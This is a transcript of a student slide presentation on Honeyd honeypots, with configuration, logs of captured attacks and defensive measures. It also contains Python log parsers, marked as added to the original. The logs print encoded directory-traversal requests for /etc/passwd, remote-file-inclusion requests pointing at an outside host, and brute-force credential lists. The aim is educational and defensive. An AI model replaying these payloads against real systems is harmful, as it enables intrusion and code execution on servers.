Using honeypots with Honeyd
DESCRIPTION
Work on the implementation of honeypots using Honeyd
TRANSCRIPT
Using Honeypots with Honeyd
Pedro Pereira, Ulisses Costa
Cryptography and Information Systems Security
18 December 2008
Pedro Pereira, Ulisses Costa: Using Honeypots with Honeyd
Outline
1 Introduction: Honeypots; Honeyd
2 Log: Honeyd main log
3 SMTP: Open mail relay
4 HTTP: webcollage/1.135a; Directory traversal; Morfeus Scanner (WebCalendar, Mambo/Joomla); Preventing Morfeus Scanner attacks; Attack on POP3; SSH
5 The threat
What are honeypots?
Programs that emulate known vulnerabilities
Traps to detect or prevent attacks
Types of honeypots
Personality
High interaction (high-interaction); Low interaction (low-interaction)
Modus operandi
Server; Client
Honeyd
Creation of virtual hosts
Configuration of those hosts
Support for more than 1000 personalities
Many dozens of scripts for service emulation
Honeyd configuration
bash > farpd 192.168.1.50 -i eth0
# File: /etc/defaults/honeyd
# Defaults for honeyd initscript
# Run as a daemon
RUN="yes"
# Network interface on which honeyd listens for requests
INTERFACE="eth0"
# Network that honeyd simulates
NETWORK=192.168.1.50
# Set of options
# -c hostname:port:username:password
OPTIONS="-c localhost:12345:username:password"
The -c hostname:port:username:password option
Generation of partial statistics for Honeyd
bash > honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port \
    --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country \
    -f /etc/honeypot/honeydstats.conf -l localhost -p 12345
# File: /etc/honeypot/honeydstats.conf
# honeydstats configuration file
username:password
Honeypot configuration (1/2)
# File: /etc/honeypot/honeyd.conf
# Honeypot configuration
create win2k
set win2k personality "Microsoft Windows 2000 SP2"
set win2k default tcp action reset
set win2k default udp action reset
set win2k default icmp action block
set win2k uptime 3567
add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"
Honeypot configuration (2/2)
add win2k udp port 137 proxy $ipsrc:137
add win2k udp port 138 proxy $ipsrc:138
add win2k udp port 445 proxy $ipsrc:445
add win2k tcp port 137 proxy $ipsrc:137
add win2k tcp port 138 proxy $ipsrc:138
add win2k tcp port 139 proxy $ipsrc:139
add win2k tcp port 445 proxy $ipsrc:445
bind 192.168.1.50 win2k
Monitoring the NETBIOS ports was not feasible
Too much complexity
Decision: proxy them back to the source
Start our honeypot:
bash > /etc/init.d/honeyd start
Files
/var/log/honeyd.txt            SMTP, Telnet, IMAP, POP3
/var/log/honeypot/web.log      HTTP
/var/log/honeypot/honeyd.log   Honeyd main log
Format of the file /var/log/honeypot/honeyd.log
Date  Protocol  T  SrcIP            SrcPort  DstIP  DstPort/Info        Comment
...   tcp(6)    S  88.44.123.210    3637     ...    139                 [Windows XP SP1]
...   tcp(6)    S  82.155.0.49      22617    ...    139
...   tcp(6)    E  82.155.1.160     4399     ...    445: 0 0
...   tcp(6)    -  82.155.122.18    61582    ...    139: 40 R
...   icmp(1)   -  80.236.5.27               ...    : 3(13): 56
...   tcp(6)    -  82.154.64.174    34507    ...    445: 40 RA
...   tcp(6)    -  124.8.74.33      1806     ...    25: 70 FPA          [Windows XP SP1]
...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA          [Windows XP SP1]
...   tcp(6)    -  168.167.152.228  58274    ...    445: 52 FA
...   tcp(6)    -  82.155.57.245    58274    ...    445: 52 PA          [Windows XP SP1]
...   tcp(6)    -  193.136.19.149   58274    ...    445: 52 PA
...   tcp(6)    -  88.175.73.149    4332     ...    139: 40 R           [Windows XP SP1]
...   tcp(6)    -  82.155.137.139   1230     ...    445: 40 A           [Windows XP SP1]
...   tcp(6)    -  82.155.7.176     2794     ...    445: 40 A
...   tcp(6)    -  82.155.116.238   3578     ...    23: 60 S            [Linux 2.6.1-7]
...   tcp(6)    -  124.207.41.198   48804    ...    23: 40 S
...   udp(17)   -  192.168.1.254    67       ...    68: 298
Date in the format: 2008-12-15-22:59:03.4039
DstIP is always the same (in this case): 192.168.1.50
Format of the file /var/log/honeypot/honeyd.log
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
For TCP and UDP not every packet transmission is recorded
That would be far too verbose
Only the amount of data transmitted is logged
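To make the format above concrete, here is a small parser and summariser for this honeyd.log layout, written for this text and not part of Honeyd or the authors' work. It assumes the field order shown on the slides (date, protocol, S/E/-, source, destination, optional ": info", optional OS fingerprint in brackets) and that the two numbers on an E line are bytes received then bytes sent; the sample lines are taken from these slides, with constructed timestamps on the three single-packet lines.

```python
import re
from collections import Counter, defaultdict

# Layout of /var/log/honeypot/honeyd.log as shown on the slides:
#   <date> <proto>(<n>) <S|E|-> <src> [<sport>] <dst> [<dport>][: <info>] [<OS fingerprint>]
# S = connection started, E = connection ended (info = two byte counts),
# - = a packet outside a tracked connection (info = size and, for TCP, the flag letters).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<proto>[a-z]+)\((?P<pnum>\d+)\)\s+"
    r"(?P<kind>[SE-])\s+"
    r"(?P<src>[\d.]+)(?:\s+(?P<sport>\d+))?\s+"
    r"(?P<dst>[\d.]+)(?:\s+(?P<dport>\d+))?"
    r"(?::\s*(?P<info>[^\[]*?))?\s*"
    r"(?:\[(?P<os>[^\]]+)\])?\s*$"
)

def parse_line(line):
    """Parse one honeyd.log line into a dict, or return None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("pnum", "sport", "dport"):
        rec[key] = int(rec[key]) if rec[key] is not None else None
    info = (rec.pop("info") or "").split()
    rec.update(bytes_recv=None, bytes_sent=None, size=None, flags=None)
    if rec["kind"] == "E" and len(info) == 2:
        # end of a tracked connection; assumed order: bytes received, bytes sent
        rec["bytes_recv"], rec["bytes_sent"] = int(info[0]), int(info[1])
    elif rec["kind"] == "-" and info:
        # lone packet: size is the first all-digit token; TCP flag letters follow the size
        rec["size"] = next((int(t) for t in info if t.isdigit()), None)
        rec["flags"] = info[1] if rec["proto"] == "tcp" and len(info) > 1 else None
    return rec

def summarize(lines):
    """Connection starts, distinct sources and traffic volume per (proto, dst port), OS guesses."""
    starts, volume, fingerprints = Counter(), Counter(), Counter()
    sources = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["proto"], rec["dport"])
        if rec["kind"] == "S":
            starts[key] += 1
            sources[key].add(rec["src"])
        elif rec["kind"] == "E" and rec["bytes_recv"] is not None:
            volume[key] += rec["bytes_recv"] + rec["bytes_sent"]
        if rec["os"]:                      # passive OS fingerprint honeyd attached
            fingerprints[rec["os"]] += 1
    return {"starts": starts, "sources": dict(sources),
            "volume": volume, "fingerprints": fingerprints}

# Sample: lines from the slides; the timestamps on the three single-packet lines are constructed.
SAMPLE = """\
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
2008-12-15-22:59:03.4039 tcp(6) - 124.8.74.33 1806 192.168.1.50 25: 70 FPA [Windows XP SP1]
2008-12-15-22:59:04.1200 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
2008-12-15-22:59:05.0001 udp(17) - 192.168.1.254 67 192.168.1.50 68: 298
""".splitlines()
```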
SMTP
Used on the server side to send messages
To receive them, POP3 or IMAP is used
SMTP - Honeypot
The EHLO command in SMTP
Command used to identify clients
The EHLO command in SMTP
S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
C: EHLO windows
S: 250-bps-pc9.local.mynet Hello [12]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250-PIPELINING
S: 250-DSN
S: 250-ENHANCEDSTATUSCODES
S: 250-8bitmime
S: 250-BINARYMIME
S: 250-CHUNKING
S: 250-VRFY
S: 250-X-EXPS GSSAPI NTLM LOGIN
S: 250-X-EXPS=LOGIN
S: 250-AUTH GSSAPI NTLM LOGIN
S: 250-AUTH=LOGIN
S: 250-X-LINK2STATE
S: 250-XEXCH50
S: 250 OK
Clients identify themselves with domain names that are not real
Spam on SMTP servers
Solutions
EHLO [host]
check whether the names resolve
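The "check whether the names resolve" idea as an added example (not from the original slides): classify the argument a client sent in EHLO/HELO using an injected resolver so the check runs offline; in production the resolver would wrap a DNS lookup. The host names, addresses and verdict labels are assumptions of this example, and it goes one step beyond the slide by also comparing the resolved address with the address the client connected from.

```python
import ipaddress
import re

# Host-name syntax accepted for an EHLO/HELO argument: dotted labels of letters, digits, hyphens.
FQDN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$", re.I)

def check_ehlo(arg, peer_ip, resolve):
    """Classify what a client sent in EHLO/HELO against the address it connected from.

    resolve(name) -> list of address strings ([] if the name does not resolve). It is
    injected so the check runs offline; wrap socket.gethostbyname_ex() for real use.
    Verdicts (labels chosen for this example): 'ok', 'not-fqdn', 'bare-ip',
    'bad-literal', 'unresolvable', 'forward-mismatch'.
    """
    arg = arg.strip()
    if arg.startswith("[") and arg.endswith("]"):
        # RFC 5321 address literal: must parse as an address and match the peer
        try:
            literal = ipaddress.ip_address(arg[1:-1])
        except ValueError:
            return "bad-literal"
        return "ok" if str(literal) == peer_ip else "forward-mismatch"
    try:
        ipaddress.ip_address(arg)
        return "bare-ip"          # e.g. "HELO 82.155.248.223" in the relay probes on these slides
    except ValueError:
        pass
    if not FQDN_RE.match(arg):
        return "not-fqdn"         # e.g. "EHLO windows"
    addrs = resolve(arg.lower())
    if not addrs:
        return "unresolvable"     # the slide's check: the name does not resolve at all
    return "ok" if peer_ip in addrs else "forward-mismatch"

# Constructed offline resolver standing in for DNS (documentation names and addresses only).
FAKE_DNS = {"mail.example.com": ["192.0.2.10"], "mx.example.net": ["198.51.100.7", "198.51.100.8"]}

def fake_resolve(name):
    return FAKE_DNS.get(name, [])
```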
Attacks
HELO 82.155.248.223
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
Attacks
HELO 82.155.251.32
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.251.32
2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418
Attacks
HELO 82.155.103.147
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Received: from ([145.200.201.114])
 by 82.155.103.147 id <9624303-98482>;
 Tue, 06 Jan 2009 21:16:04 -0100
Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
From: "" <[email protected]>
To: <[email protected]>
Subject: BC_82.155.103.147
Date: Tue, 06 Jan 09 21:16:04 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
HTTP hits
User agent: webcollage/1.135a
--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,
"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Referer: http://random.yahoo.com/fast/ryl
Host: www.morgangirl.com
",
--ENDMARK--
Attempt to fetch an image through the honeypot
The honeypot may have been "seen" by a proxy scanner
The honeypot was treated as an open proxy
Directory traversal
Also known as the dot-dot-slash attack (../)
Exploits insufficient validation of requests
Targets system files
GET ../../../../../../../../../../etc/passwd HTTP/1.1
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
Directory traversal
GET .../../../../../../../../../../etc/passwd HTTP/1.1
--MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,
"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
Directory traversal
GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1
--MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,
"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
Directory traversal
GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
--MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,
"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
Directory traversal
GET //etc/passwd HTTP/1.1
--MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,
"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
Conclusion
Not successful against the honeypot
Low-interaction system
On our honeypot the reply was error 302 Object moved
Use of the Nmap scripting engine
Morfeus Scanner
Searches for PHP vulnerabilities
Known vulnerabilities
Morfeus Scanner - WebCalendar
Creation of online calendars
Vulnerability in the file send_reminders.php
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
Morfeus Scanner - Mambo/Joomla
Very well-known CMSs
The attacker tries to set the mosConfig_absolute_path variable used by index.php
--MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,
"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
Preventing Morfeus Scanner attacks
One way to block this type of attack coming from the Morfeus Scanner (MFS) is to add the following lines to the ".htaccess" file in the website's folder.
# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
# End of .htaccess change.
Brute-force attempt on the POP3 server
Brute-force attempt on the POP3 server
...
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,
"USER root
PASS root
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,
"USER root
PASS root1
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,
"USER staff
PASS staff
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,
"USER root
PASS 12345
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,
"USER www
PASS www
",
--ENDMARK--
...
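An added example, not from the slides, serving both the HTTP slides above (directory traversal, Morfeus Scanner, remote include, the webcollage open-proxy probe) and this POP3 slide: it parses the --MARK--/--ENDMARK-- records of the honeyd service logs, tags each captured HTTP request the way the slides group them, and counts USER/PASS attempts per source on the POP3 service. It assumes the record header sits on one line; the sample records are constructed from the ones shown on the slides.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# honeyd service-log record (web.log, exchange/POP3) as shown on the slides, header assumed
# on one line: --MARK--,"<date>","<service>","<src ip>","<dst ip>",<src port>,<dst port>,
# followed by the captured payload between a leading '"' and a closing '",', then --ENDMARK--
HEADER_RE = re.compile(r'^--MARK--,"(?P<ts>[^"]*)","(?P<svc>[^"]*)","(?P<src>[^"]*)",'
                       r'"(?P<dst>[^"]*)",(?P<sport>\d+),(?P<dport>\d+),$')

def parse_records(text):
    """One dict per --MARK--/--ENDMARK-- block; 'payload' holds the captured text."""
    records, cur = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = dict(m.groupdict(), lines=[])
        elif cur and line == "--ENDMARK--":
            body = "\n".join(cur.pop("lines")).strip()
            cur["payload"] = body[1:].rstrip(",").rstrip('"').strip()  # drop '"' and '",'
            records.append(cur)
            cur = None
        elif cur:
            cur["lines"].append(line)
    return records

def decode_path(raw):
    """Percent-decode until stable (defeats double encoding); treat '\\' as '/'."""
    decoded = unquote(raw)
    while decoded != raw:
        raw, decoded = decoded, unquote(decoded)
    return decoded.replace("\\", "/")

def classify_http(payload):
    """Tag one captured HTTP request the way the slides group them."""
    tags, parts = [], payload.split("\n", 1)[0].split()
    target = parts[1] if len(parts) >= 2 else ""
    path = decode_path(target)
    if "../" in path or path.startswith("//"):      # dot-dot-slash probes, incl. //etc/passwd
        tags.append("directory-traversal")
    if "user-agent: morfeus" in payload.lower():
        tags.append("morfeus-scanner")
    if re.search(r"[?&][^=]+=https?://", target):   # includedir=http://... remote include
        tags.append("remote-include")
    if target.startswith(("http://", "https://")):  # absolute URI: open-proxy probe
        tags.append("proxy-probe")
    return tags

def pop3_login_attempts(records):
    """USER/PASS pairs per source IP on the POP3 service: a brute-force indicator."""
    attempts = defaultdict(list)
    for r in (r for r in records if "POP3" in r["svc"]):
        creds = dict(ln.split(" ", 1) for ln in r["payload"].splitlines() if " " in ln)
        if "USER" in creds:
            attempts[r["src"]].append((creds["USER"], creds.get("PASS")))
    return dict(attempts)

# Constructed sample records modelled on the ones shown on the slides.
SAMPLE_LOG = """\
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
",
--ENDMARK--
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,
"USER root
PASS root
",
--ENDMARK--
"""
```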
SSH
Here is a chart showing the user names attempted:
SSH
And the following chart shows the passwords attempted:
The threat
Port scanning
Discover machines and their open ports
Crafting of custom packets
Hard to master
Nmap - insecure.org
Port scanning
Open or Accepted: the machine sent a reply indicating that a service is listening on that port;
Closed, Denied or Not Listening: the machine sent a reply indicating that any connection to the port will be refused;
Filtered, Dropped or Blocked: no reply from the machine.
Port scanning
Types of techniques
TCP/SYN
TCP Connect
UDP
TCP Connect
Port scanning
Optimization
golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
...
Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
...
Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds
Attack
Brute force / Dictionaries
Exploitation of vulnerabilities
SSH
Port 22
Attacked by brute force / dictionaries
cat /var/log/auth.log
SSH - log
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
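The detection side of this log, as an added example (not the authors' code): aggregate sshd failures per remote IP from /var/log/auth.log lines like the ones above and list the sources that exceed a threshold, which is the input a firewall rule or stricter password policy would act on. The sample lines are the slide's entries joined onto single lines plus one constructed entry for an existing account from the documentation address 203.0.113.9.

```python
import re
from collections import defaultdict

# Three sshd message types from /var/log/auth.log (syslog format, as on the slide).
TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) ")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?P<invalid>invalid user )?"
                       r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$")
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<ip>[\d.]+)$")
REVDNS_RE = re.compile(r"reverse mapping checking getaddrinfo for \S+ \[(?P<ip>[\d.]+)\] failed")

def classify(line):
    """Return (kind, ip, user) for the sshd events we track, or None for other lines."""
    m = FAILED_RE.search(line)
    if m:
        return ("failed-invalid" if m["invalid"] else "failed-valid", m["ip"], m["user"])
    m = INVALID_RE.search(line)
    if m:
        return ("invalid-user", m["ip"], m["user"])
    m = REVDNS_RE.search(line)
    if m:
        return ("revdns-failed", m["ip"], None)
    return None

def summarize_auth_log(lines):
    """Per remote IP: failed logins, user names tried, reverse-DNS failures, time span."""
    per_ip = defaultdict(lambda: {"failed": 0, "invalid_users": set(), "valid_users": set(),
                                  "revdns_failed": 0, "first": None, "last": None})
    for line in lines:
        ev = classify(line)
        if ev is None:
            continue
        kind, ip, user = ev
        e = per_ip[ip]
        if kind.startswith("failed"):
            e["failed"] += 1
            (e["invalid_users"] if kind == "failed-invalid" else e["valid_users"]).add(user)
        elif kind == "invalid-user":
            e["invalid_users"].add(user)
        else:
            e["revdns_failed"] += 1
        ts = TS_RE.match(line)
        if ts:
            e["first"] = e["first"] or ts["ts"]
            e["last"] = ts["ts"]
    return dict(per_ip)

def brute_force_sources(per_ip, min_failures=3):
    """Sources with at least min_failures failed logins: candidates for an iptables drop rule."""
    return sorted(ip for ip, e in per_ip.items() if e["failed"] >= min_failures)

# Sample: the slide's lines joined onto single lines, plus one constructed entry for an
# existing account from the documentation address 203.0.113.9.
SAMPLE_AUTH = """\
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:30:00 golden-laptop sshd[24001]: Failed password for root from 203.0.113.9 port 4000 ssh2
""".splitlines()
```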
SSH
Defense:
IPTables; stronger passwords; RSA authentication
SSH
passwords of at least 8 characters
non-trivial passwords
alphanumeric combinations
mnemonic: “Um Whiskey-Cola vale 3 euros no BA!” (Portuguese for “A Whiskey-Cola costs 3 euros at the BA!”) = “UW-Cv3enBA!”
SSH
http://www.passwordmeter.com/
SSH - RSA authentication
1 Generate the key pair with the command "ssh-keygen -t rsa". This creates the files ~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key)
2 On each machine we want to connect to (destination), place the generated "id_rsa.pub" in ~/.ssh/authorized_keys by appending its contents, for example: "cat id_rsa.pub >> ~/.ssh/authorized_keys"
3 On each machine we want to connect from (origin), place the "id_rsa" in ~/.ssh/
4 All that remains is to disable password-based login by adding the line "PasswordAuthentication no" to /etc/ssh/sshd_config and then restarting the "sshd" daemon with "/etc/init.d/sshd restart".
Vulnerabilities
Unforeseen behaviour in a software artifact
Buffer Overflow
Unvalidated input
SQL Injection
Exploitation of vulnerabilities
Exploit
The name given to a piece of code that exploits flaws in applications in order to cause behaviour in them that was not anticipated.
#include <stdio.h>
#include <string.h>
